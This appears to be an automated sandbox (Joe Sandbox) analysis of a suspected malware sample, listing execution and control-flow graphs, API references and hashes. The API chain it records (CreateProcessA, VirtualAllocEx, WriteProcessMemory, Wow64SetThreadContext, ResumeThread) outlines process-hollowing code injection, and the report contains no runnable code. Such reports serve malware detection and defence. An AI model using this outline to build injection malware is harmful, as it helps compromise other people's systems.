                                            execution_graph 34927 6f8a888 34928 6f8a8ae 34927->34928 34929 6f8aa13 34927->34929 34928->34929 34931 6f88c44 34928->34931 34932 6f8ab08 PostMessageW 34931->34932 34933 6f8ab74 34932->34933 34933->34928 34644 6f87e6d 34646 6f87d8f 34644->34646 34645 6f880b6 34646->34645 34651 6f895c0 34646->34651 34670 6f89626 34646->34670 34690 6f89581 34646->34690 34709 6f895a0 34646->34709 34652 6f895da 34651->34652 34653 6f895e2 34652->34653 34728 6f8a053 34652->34728 34736 6f89c52 34652->34736 34741 6f8a078 34652->34741 34749 6f89fc6 34652->34749 34757 6f89c85 34652->34757 34762 6f89ac3 34652->34762 34770 6f89b02 34652->34770 34775 6f89ca1 34652->34775 34780 6f89a00 34652->34780 34784 6f89aef 34652->34784 34790 6f89ed7 34652->34790 34795 6f89dd5 34652->34795 34803 6f89b94 34652->34803 34808 6f89e34 34652->34808 34816 6f89b73 34652->34816 34821 6f89df3 34652->34821 34653->34645 34671 6f895b4 34670->34671 34672 6f89629 34670->34672 34673 6f8a078 4 API calls 34671->34673 34674 6f89c52 2 API calls 34671->34674 34675 6f8a053 4 API calls 34671->34675 34676 6f89df3 2 API calls 34671->34676 34677 6f89b73 2 API calls 34671->34677 34678 6f89e34 4 API calls 34671->34678 34679 6f89b94 2 API calls 34671->34679 34680 6f89dd5 4 API calls 34671->34680 34681 6f89ed7 2 API calls 34671->34681 34682 6f895e2 34671->34682 34683 6f89aef 2 API calls 34671->34683 34684 6f89a00 2 API calls 34671->34684 34685 6f89ca1 2 API calls 34671->34685 34686 6f89b02 2 API calls 34671->34686 34687 6f89ac3 4 API calls 34671->34687 34688 6f89c85 2 API calls 34671->34688 34689 6f89fc6 4 API calls 34671->34689 34672->34645 34673->34682 34674->34682 34675->34682 34676->34682 34677->34682 34678->34682 34679->34682 34680->34682 34681->34682 34682->34645 34683->34682 34684->34682 34685->34682 34686->34682 34687->34682 34688->34682 34689->34682 34691 6f895f5 34690->34691 34701 6f8958a 34690->34701 34692 6f8a078 4 API calls 34691->34692 34693 6f89c52 2 API calls 34691->34693 34694 
6f8a053 4 API calls 34691->34694 34695 6f89df3 2 API calls 34691->34695 34696 6f89b73 2 API calls 34691->34696 34697 6f89e34 4 API calls 34691->34697 34698 6f89b94 2 API calls 34691->34698 34699 6f89dd5 4 API calls 34691->34699 34700 6f89ed7 2 API calls 34691->34700 34691->34701 34702 6f89aef 2 API calls 34691->34702 34703 6f89a00 2 API calls 34691->34703 34704 6f89ca1 2 API calls 34691->34704 34705 6f89b02 2 API calls 34691->34705 34706 6f89ac3 4 API calls 34691->34706 34707 6f89c85 2 API calls 34691->34707 34708 6f89fc6 4 API calls 34691->34708 34692->34701 34693->34701 34694->34701 34695->34701 34696->34701 34697->34701 34698->34701 34699->34701 34700->34701 34701->34645 34702->34701 34703->34701 34704->34701 34705->34701 34706->34701 34707->34701 34708->34701 34710 6f895b4 34709->34710 34711 6f8a078 4 API calls 34710->34711 34712 6f89c52 2 API calls 34710->34712 34713 6f8a053 4 API calls 34710->34713 34714 6f89df3 2 API calls 34710->34714 34715 6f89b73 2 API calls 34710->34715 34716 6f89e34 4 API calls 34710->34716 34717 6f89b94 2 API calls 34710->34717 34718 6f89dd5 4 API calls 34710->34718 34719 6f89ed7 2 API calls 34710->34719 34720 6f895e2 34710->34720 34721 6f89aef 2 API calls 34710->34721 34722 6f89a00 2 API calls 34710->34722 34723 6f89ca1 2 API calls 34710->34723 34724 6f89b02 2 API calls 34710->34724 34725 6f89ac3 4 API calls 34710->34725 34726 6f89c85 2 API calls 34710->34726 34727 6f89fc6 4 API calls 34710->34727 34711->34720 34712->34720 34713->34720 34714->34720 34715->34720 34716->34720 34717->34720 34718->34720 34719->34720 34720->34645 34721->34720 34722->34720 34723->34720 34724->34720 34725->34720 34726->34720 34727->34720 34729 6f8a096 34728->34729 34825 6f86bf8 34729->34825 34829 6f86c00 34729->34829 34730 6f8a0ab 34833 6f870e8 34730->34833 34837 6f870e1 34730->34837 34731 6f8a1be 34737 6f89bab 34736->34737 34738 6f89a58 34737->34738 34841 6f875f8 34737->34841 34845 6f875f1 34737->34845 34738->34653 34742 6f8a07e 34741->34742 34747 6f86bf8 
ResumeThread 34742->34747 34748 6f86c00 ResumeThread 34742->34748 34743 6f8a0ab 34745 6f870e8 Wow64SetThreadContext 34743->34745 34746 6f870e1 Wow64SetThreadContext 34743->34746 34744 6f8a1be 34745->34744 34746->34744 34747->34743 34748->34743 34750 6f89dec 34749->34750 34755 6f86bf8 ResumeThread 34750->34755 34756 6f86c00 ResumeThread 34750->34756 34751 6f8a0ab 34753 6f870e8 Wow64SetThreadContext 34751->34753 34754 6f870e1 Wow64SetThreadContext 34751->34754 34752 6f8a1be 34753->34752 34754->34752 34755->34751 34756->34751 34758 6f89b19 34757->34758 34758->34757 34759 6f89abf 34758->34759 34849 6f876b8 34758->34849 34853 6f876b0 34758->34853 34759->34653 34763 6f89adc 34762->34763 34764 6f89e48 34763->34764 34766 6f86bf8 ResumeThread 34763->34766 34767 6f86c00 ResumeThread 34763->34767 34768 6f870e8 Wow64SetThreadContext 34764->34768 34769 6f870e1 Wow64SetThreadContext 34764->34769 34765 6f8a1be 34766->34764 34767->34764 34768->34765 34769->34765 34771 6f89b08 34770->34771 34772 6f89abf 34771->34772 34773 6f876b8 WriteProcessMemory 34771->34773 34774 6f876b0 WriteProcessMemory 34771->34774 34772->34653 34773->34771 34774->34771 34777 6f89bab 34775->34777 34776 6f8a29d 34776->34653 34777->34776 34778 6f875f8 VirtualAllocEx 34777->34778 34779 6f875f1 VirtualAllocEx 34777->34779 34778->34777 34779->34777 34857 6f87940 34780->34857 34861 6f87934 34780->34861 34785 6f89afc 34784->34785 34787 6f89a58 34784->34787 34788 6f870e8 Wow64SetThreadContext 34785->34788 34789 6f870e1 Wow64SetThreadContext 34785->34789 34786 6f89fb3 34787->34653 34788->34786 34789->34786 34791 6f89efa 34790->34791 34793 6f876b8 WriteProcessMemory 34791->34793 34794 6f876b0 WriteProcessMemory 34791->34794 34792 6f8a3c1 34793->34792 34794->34792 34796 6f89ddb 34795->34796 34801 6f86bf8 ResumeThread 34796->34801 34802 6f86c00 ResumeThread 34796->34802 34797 6f8a0ab 34799 6f870e8 Wow64SetThreadContext 34797->34799 34800 6f870e1 Wow64SetThreadContext 34797->34800 34798 6f8a1be 34799->34798 34800->34798 
34801->34797 34802->34797 34804 6f89b9a 34803->34804 34805 6f8a29d 34804->34805 34806 6f875f8 VirtualAllocEx 34804->34806 34807 6f875f1 VirtualAllocEx 34804->34807 34805->34653 34806->34804 34807->34804 34811 6f89e3a 34808->34811 34809 6f89e48 34814 6f870e8 Wow64SetThreadContext 34809->34814 34815 6f870e1 Wow64SetThreadContext 34809->34815 34810 6f8a1be 34811->34809 34812 6f86bf8 ResumeThread 34811->34812 34813 6f86c00 ResumeThread 34811->34813 34812->34809 34813->34809 34814->34810 34815->34810 34817 6f89b7c 34816->34817 34819 6f876b8 WriteProcessMemory 34817->34819 34820 6f876b0 WriteProcessMemory 34817->34820 34818 6f89c33 34818->34653 34819->34818 34820->34818 34822 6f89e00 34821->34822 34865 6f877a8 34822->34865 34869 6f877a1 34822->34869 34826 6f86c40 ResumeThread 34825->34826 34828 6f86c71 34826->34828 34828->34730 34830 6f86c40 ResumeThread 34829->34830 34832 6f86c71 34830->34832 34832->34730 34834 6f8712d Wow64SetThreadContext 34833->34834 34836 6f87175 34834->34836 34836->34731 34838 6f8712d Wow64SetThreadContext 34837->34838 34840 6f87175 34838->34840 34840->34731 34842 6f87638 VirtualAllocEx 34841->34842 34844 6f87675 34842->34844 34844->34737 34846 6f875f8 VirtualAllocEx 34845->34846 34848 6f87675 34846->34848 34848->34737 34850 6f87700 WriteProcessMemory 34849->34850 34852 6f87757 34850->34852 34852->34758 34854 6f87700 WriteProcessMemory 34853->34854 34856 6f87757 34854->34856 34856->34758 34858 6f879c9 CreateProcessA 34857->34858 34860 6f87b8b 34858->34860 34862 6f87940 CreateProcessA 34861->34862 34864 6f87b8b 34862->34864 34866 6f877f3 ReadProcessMemory 34865->34866 34868 6f87837 34866->34868 34868->34822 34870 6f877a8 ReadProcessMemory 34869->34870 34872 6f87837 34870->34872 34872->34822 34934 275d380 34935 275d3c6 GetCurrentProcess 34934->34935 34937 275d411 34935->34937 34938 275d418 GetCurrentThread 34935->34938 34937->34938 34939 275d455 GetCurrentProcess 34938->34939 34940 275d44e 34938->34940 34941 275d48b 34939->34941 34940->34939 34942 
275d4b3 GetCurrentThreadId 34941->34942 34943 275d4e4 34942->34943 34873 4dd4380 34876 4dd3378 34873->34876 34875 4dd438d 34877 4dd3383 34876->34877 34881 2755d58 34877->34881 34885 27572f7 34877->34885 34878 4dd4524 34878->34875 34882 2755d63 34881->34882 34889 2755d88 34882->34889 34884 27573ad 34884->34878 34886 2757302 34885->34886 34887 2755d88 GetModuleHandleW 34886->34887 34888 27573ad 34887->34888 34888->34878 34890 2755d93 34889->34890 34892 275890b 34890->34892 34895 275abb3 34890->34895 34891 2758949 34891->34884 34892->34891 34898 275cca0 34892->34898 34903 275aff0 34895->34903 34899 275ccd1 34898->34899 34900 275ccf5 34899->34900 34911 275d268 34899->34911 34915 275d258 34899->34915 34900->34891 34906 275b0e8 34903->34906 34904 275abc6 34904->34892 34907 275b11c 34906->34907 34908 275b0f9 34906->34908 34907->34904 34908->34907 34909 275b320 GetModuleHandleW 34908->34909 34910 275b34d 34909->34910 34910->34904 34913 275d275 34911->34913 34912 275d2af 34912->34900 34913->34912 34919 275d0a0 34913->34919 34916 275d268 34915->34916 34917 275d2af 34916->34917 34918 275d0a0 GetModuleHandleW 34916->34918 34917->34900 34918->34917 34920 275d0ab 34919->34920 34922 275dbc0 34920->34922 34923 275d1bc 34920->34923 34924 275d1c7 34923->34924 34925 2755d88 GetModuleHandleW 34924->34925 34926 275dc2f 34925->34926 34926->34922 34944 275d5c8 DuplicateHandle 34945 275d65e 34944->34945
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a7853c8c155a339d62e6471beb3b859b7a57c242ff344a1046b4991e2ec4a7d
                                            • Instruction ID: 4469080de0506e018ff475803bc35df6c25836bef3ac1599c76977faa5fa464b
                                            • Opcode Fuzzy Hash: 4a7853c8c155a339d62e6471beb3b859b7a57c242ff344a1046b4991e2ec4a7d
                                            • Instruction Fuzzy Hash: E531E8B1D00618CFEB58DF9BD8447EEBBF6AF88301F14C0AAD409AA254DB751946CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db286c69524ac2154ed9d70bf53f1e4a389e306bae51a0b413e2663c724e61d7
                                            • Instruction ID: 9d027f5c8ec3f0f240c481decb1942d96df431b6fa3d80b2ba22181789d2adce
                                            • Opcode Fuzzy Hash: db286c69524ac2154ed9d70bf53f1e4a389e306bae51a0b413e2663c724e61d7
                                            • Instruction Fuzzy Hash: 3B21E7B1D016188FEB58DFABD8443DEBFF6AF88300F14C1AAD4096A254DB750946CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a4b27af3c4969b17d4e55ee4cfdbeade2167bd9d87393ba8f74d79247dfd420
                                            • Instruction ID: c0e8ed4358aaf1ea171d3fd73868454a740506f87b586d6587776ec2af748314
                                            • Opcode Fuzzy Hash: 0a4b27af3c4969b17d4e55ee4cfdbeade2167bd9d87393ba8f74d79247dfd420
                                            • Instruction Fuzzy Hash: 58F0F871D092ACCFDBD4EE298C402FCB6B5AB8B300F40A4D2C11DA6100D6744AC5CE88

Control-flow Graph (nodes marked Executed / Not Executed)
                                            control_flow_graph 373 275d371-275d378 374 275d334-275d36f 373->374 375 275d37a-275d40f GetCurrentProcess 373->375 384 275d411-275d417 375->384 385 275d418-275d44c GetCurrentThread 375->385 384->385 386 275d455-275d489 GetCurrentProcess 385->386 387 275d44e-275d454 385->387 390 275d492-275d4ad call 275d550 386->390 391 275d48b-275d491 386->391 387->386 394 275d4b3-275d4e2 GetCurrentThreadId 390->394 391->390 395 275d4e4-275d4ea 394->395 396 275d4eb-275d54d 394->396 395->396
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0275D3FE
                                            • GetCurrentThread.KERNEL32 ref: 0275D43B
                                            • GetCurrentProcess.KERNEL32 ref: 0275D478
                                            • GetCurrentThreadId.KERNEL32 ref: 0275D4D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: 4']q
                                            • API String ID: 2063062207-1259897404
                                            • Opcode ID: 6a4617779a5c5573e9ad63329e50f3acfa3b578f0f3c5257960165f4bc50cb19
                                            • Instruction ID: 6a5b4d51574846de8ea9a538afb3c8de9053d2bec10325169037f6876becfe49
                                            • Opcode Fuzzy Hash: 6a4617779a5c5573e9ad63329e50f3acfa3b578f0f3c5257960165f4bc50cb19
                                            • Instruction Fuzzy Hash: A0618AB49012099FDB14DFA9D548BAEFBF5FF48304F2084A9D409A73A0D774A948CF65

                                            Control-flow Graph

                                            control_flow_graph 403 275d380-275d40f GetCurrentProcess 407 275d411-275d417 403->407 408 275d418-275d44c GetCurrentThread 403->408 407->408 409 275d455-275d489 GetCurrentProcess 408->409 410 275d44e-275d454 408->410 412 275d492-275d4ad call 275d550 409->412 413 275d48b-275d491 409->413 410->409 416 275d4b3-275d4e2 GetCurrentThreadId 412->416 413->412 417 275d4e4-275d4ea 416->417 418 275d4eb-275d54d 416->418 417->418
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0275D3FE
                                            • GetCurrentThread.KERNEL32 ref: 0275D43B
                                            • GetCurrentProcess.KERNEL32 ref: 0275D478
                                            • GetCurrentThreadId.KERNEL32 ref: 0275D4D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 4000a64823a2a5843df51a8b713848805074b5a84e58ff794c0f144c3fe9ce6a
                                            • Instruction ID: bf925f4ba25a00fbbb889c03d3a2acd327131fee824af5638cc4587a8a4c1f29
                                            • Opcode Fuzzy Hash: 4000a64823a2a5843df51a8b713848805074b5a84e58ff794c0f144c3fe9ce6a
                                            • Instruction Fuzzy Hash: 625168B49012099FDB14DFA9D548BAEFBF5EF48304F20C459D909A73A0D774A848CF65

                                            Control-flow Graph

                                            control_flow_graph 552 6f87934-6f879d5 555 6f87a0e-6f87a2e 552->555 556 6f879d7-6f879e1 552->556 563 6f87a30-6f87a3a 555->563 564 6f87a67-6f87a96 555->564 556->555 557 6f879e3-6f879e5 556->557 558 6f87a08-6f87a0b 557->558 559 6f879e7-6f879f1 557->559 558->555 561 6f879f3 559->561 562 6f879f5-6f87a04 559->562 561->562 562->562 565 6f87a06 562->565 563->564 566 6f87a3c-6f87a3e 563->566 570 6f87a98-6f87aa2 564->570 571 6f87acf-6f87b89 CreateProcessA 564->571 565->558 568 6f87a40-6f87a4a 566->568 569 6f87a61-6f87a64 566->569 572 6f87a4c 568->572 573 6f87a4e-6f87a5d 568->573 569->564 570->571 575 6f87aa4-6f87aa6 570->575 584 6f87b8b-6f87b91 571->584 585 6f87b92-6f87c18 571->585 572->573 573->573 574 6f87a5f 573->574 574->569 576 6f87aa8-6f87ab2 575->576 577 6f87ac9-6f87acc 575->577 579 6f87ab4 576->579 580 6f87ab6-6f87ac5 576->580 577->571 579->580 580->580 582 6f87ac7 580->582 582->577 584->585 595 6f87c28-6f87c2c 585->595 596 6f87c1a-6f87c1e 585->596 598 6f87c3c-6f87c40 595->598 599 6f87c2e-6f87c32 595->599 596->595 597 6f87c20 596->597 597->595 601 6f87c50-6f87c54 598->601 602 6f87c42-6f87c46 598->602 599->598 600 6f87c34 599->600 600->598 603 6f87c66-6f87c6d 601->603 604 6f87c56-6f87c5c 601->604 602->601 605 6f87c48 602->605 606 6f87c6f-6f87c7e 603->606 607 6f87c84 603->607 604->603 605->601 606->607 609 6f87c85 607->609 609->609
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F87B76
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 433195c2b6d77645770b2686b18cc37f94125f69853f069a19496766e1b6f228
                                            • Instruction ID: 1962def60b374cf39f1f1178d91a6be04156698883138f335d8bb5cd8128ac98
                                            • Opcode Fuzzy Hash: 433195c2b6d77645770b2686b18cc37f94125f69853f069a19496766e1b6f228
                                            • Instruction Fuzzy Hash: D7A17E71D00219CFDB61EF68C841BEDBBB2BF49304F1485AAD808A7290DB749A85CF91

                                            Control-flow Graph

                                            control_flow_graph 610 6f87940-6f879d5 612 6f87a0e-6f87a2e 610->612 613 6f879d7-6f879e1 610->613 620 6f87a30-6f87a3a 612->620 621 6f87a67-6f87a96 612->621 613->612 614 6f879e3-6f879e5 613->614 615 6f87a08-6f87a0b 614->615 616 6f879e7-6f879f1 614->616 615->612 618 6f879f3 616->618 619 6f879f5-6f87a04 616->619 618->619 619->619 622 6f87a06 619->622 620->621 623 6f87a3c-6f87a3e 620->623 627 6f87a98-6f87aa2 621->627 628 6f87acf-6f87b89 CreateProcessA 621->628 622->615 625 6f87a40-6f87a4a 623->625 626 6f87a61-6f87a64 623->626 629 6f87a4c 625->629 630 6f87a4e-6f87a5d 625->630 626->621 627->628 632 6f87aa4-6f87aa6 627->632 641 6f87b8b-6f87b91 628->641 642 6f87b92-6f87c18 628->642 629->630 630->630 631 6f87a5f 630->631 631->626 633 6f87aa8-6f87ab2 632->633 634 6f87ac9-6f87acc 632->634 636 6f87ab4 633->636 637 6f87ab6-6f87ac5 633->637 634->628 636->637 637->637 639 6f87ac7 637->639 639->634 641->642 652 6f87c28-6f87c2c 642->652 653 6f87c1a-6f87c1e 642->653 655 6f87c3c-6f87c40 652->655 656 6f87c2e-6f87c32 652->656 653->652 654 6f87c20 653->654 654->652 658 6f87c50-6f87c54 655->658 659 6f87c42-6f87c46 655->659 656->655 657 6f87c34 656->657 657->655 660 6f87c66-6f87c6d 658->660 661 6f87c56-6f87c5c 658->661 659->658 662 6f87c48 659->662 663 6f87c6f-6f87c7e 660->663 664 6f87c84 660->664 661->660 662->658 663->664 666 6f87c85 664->666 666->666
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F87B76
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: e3bdf905d5f4f5683f02f21f9e50882ec4ac539ba67ae468a46fd7a57fe349a1
                                            • Instruction ID: 6ac234d16b779af5e72df189790ddf77a8c2521e2838d8d9f1aceaab792abf55
                                            • Opcode Fuzzy Hash: e3bdf905d5f4f5683f02f21f9e50882ec4ac539ba67ae468a46fd7a57fe349a1
                                            • Instruction Fuzzy Hash: 11917E71D00219CFDF60EF68C840BEDBBB2BF49304F1485AAD808A7290DB749A85CF91

                                            Control-flow Graph

                                            control_flow_graph 667 275b0e8-275b0f7 668 275b123-275b127 667->668 669 275b0f9-275b106 call 275ada0 667->669 671 275b129-275b133 668->671 672 275b13b-275b17c 668->672 676 275b11c 669->676 677 275b108 669->677 671->672 678 275b17e-275b186 672->678 679 275b189-275b197 672->679 676->668 725 275b10e call 275b370 677->725 726 275b10e call 275b380 677->726 678->679 680 275b199-275b19e 679->680 681 275b1bb-275b1bd 679->681 683 275b1a0-275b1a7 call 275adac 680->683 684 275b1a9 680->684 686 275b1c0-275b1c7 681->686 682 275b114-275b116 682->676 685 275b258-275b318 682->685 688 275b1ab-275b1b9 683->688 684->688 718 275b320-275b34b GetModuleHandleW 685->718 719 275b31a-275b31d 685->719 689 275b1d4-275b1db 686->689 690 275b1c9-275b1d1 686->690 688->686 691 275b1dd-275b1e5 689->691 692 275b1e8-275b1f1 call 275adbc 689->692 690->689 691->692 698 275b1f3-275b1fb 692->698 699 275b1fe-275b203 692->699 698->699 700 275b205-275b20c 699->700 701 275b221-275b225 699->701 700->701 703 275b20e-275b21e call 275adcc call 275addc 700->703 723 275b228 call 275b670 701->723 724 275b228 call 275b680 701->724 703->701 706 275b22b-275b22e 707 275b251-275b257 706->707 708 275b230-275b24e 706->708 708->707 720 275b354-275b368 718->720 721 275b34d-275b353 718->721 719->718 721->720 723->706 724->706 725->682 726->682
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275B33E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 879dd8e9369a9c6078698c1d1e09af4280a3ae46fbfdccf5bc4020bffbc4202c
                                            • Instruction ID: 5cf5a183757d06515b20f47493e48517550d60f0ff3c786137f161585ec000f6
                                            • Opcode Fuzzy Hash: 879dd8e9369a9c6078698c1d1e09af4280a3ae46fbfdccf5bc4020bffbc4202c
                                            • Instruction Fuzzy Hash: 1F714670A00B158FD764DF6AD44476ABBF1FF88308F108A2DD846D7A54DBB5E845CB90

                                            Control-flow Graph

                                            control_flow_graph 837 275590c-275597a 839 275597d-27559d9 CreateActCtxA 837->839 841 27559e2-2755a3c 839->841 842 27559db-27559e1 839->842 849 2755a3e-2755a41 841->849 850 2755a4b-2755a4f 841->850 842->841 849->850 851 2755a51-2755a5d 850->851 852 2755a60 850->852 851->852 854 2755a61 852->854 854->854
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 962065415e9e4cabf2ca042b3d770cf87cd7cae60ce910297cbc6a14e56f1954
                                            • Instruction ID: dfba3d7dc7ecda24b9c5acea3607d98ac84a78842642cd6d76b0fa7c0dee2bac
                                            • Opcode Fuzzy Hash: 962065415e9e4cabf2ca042b3d770cf87cd7cae60ce910297cbc6a14e56f1954
                                            • Instruction Fuzzy Hash: 2541F5B0C00719CFDB14DFA9C884A9EFBF5BF49304F60816AD409AB254D7755949CF91

                                            Control-flow Graph

                                            control_flow_graph 855 2754514-27559d9 CreateActCtxA 859 27559e2-2755a3c 855->859 860 27559db-27559e1 855->860 867 2755a3e-2755a41 859->867 868 2755a4b-2755a4f 859->868 860->859 867->868 869 2755a51-2755a5d 868->869 870 2755a60 868->870 869->870 872 2755a61 870->872 872->872
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ff8c044f4f1dfa4c1ad2d4351590760c689710f63ed862cc4e6f10e71ff0182c
                                            • Instruction ID: d84cb4a4c69837ce292c0ca91f193fe5738fa04010f779b00fe5d05572a1e342
                                            • Opcode Fuzzy Hash: ff8c044f4f1dfa4c1ad2d4351590760c689710f63ed862cc4e6f10e71ff0182c
                                            • Instruction Fuzzy Hash: FA41F2B4C0061DCBDB24DFA9C844B9EFBB5BF48304F60806AD409AB255DBB56949CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4946654490d4762c0050904c3d37a94a6e310434b0e292d67e1db0e2b7a7e239
                                            • Instruction ID: 6886a4e8233c0ca342283ebfb7756a2b20e9b324032396e3c6c6683765d6f404
                                            • Opcode Fuzzy Hash: 4946654490d4762c0050904c3d37a94a6e310434b0e292d67e1db0e2b7a7e239
                                            • Instruction Fuzzy Hash: 02319AB5C04259CFDB11DFA8C85879EBFF1BF15308F54408AD805AB295D7B9990ACF41
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87748
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 7072616c6ca571dafa3caf99968a746c803ba85f2ebb6e1bc953c940e80f0099
                                            • Instruction ID: 99e74036192d019d2268cff8948278f0ae88a5e0e44cbdc0adb3c71242aff0d2
                                            • Opcode Fuzzy Hash: 7072616c6ca571dafa3caf99968a746c803ba85f2ebb6e1bc953c940e80f0099
                                            • Instruction Fuzzy Hash: 002157B5D003099FCB10DFA9C981BEEBBF5FF48310F10882AE919A7240D7789941CBA0
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87748
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ab08b88c4958a0f5332154e5b2c7501e5e46066a8980e0df782f065be2f0f08c
                                            • Instruction ID: f6cd0fe29360336cdc37ecfa9ad08b71a1bb08fdc86ab5bf5dc4993c3af25ebc
                                            • Opcode Fuzzy Hash: ab08b88c4958a0f5332154e5b2c7501e5e46066a8980e0df782f065be2f0f08c
                                            • Instruction Fuzzy Hash: DE2136B5D003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7789944CBA4
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87828
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 060898a054a30227da1ee424bb198ac71ef44aa2454b164f1b54de01e7c652d2
                                            • Instruction ID: fb1e895b3976352e173a0788fad79a6f58b75220646d261c1daa53b380d5813b
                                            • Opcode Fuzzy Hash: 060898a054a30227da1ee424bb198ac71ef44aa2454b164f1b54de01e7c652d2
                                            • Instruction Fuzzy Hash: AE2128B1C003499FCB10DFAAC840AEEFBF5FF48310F60842AE559A7250D7789540CBA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F87166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
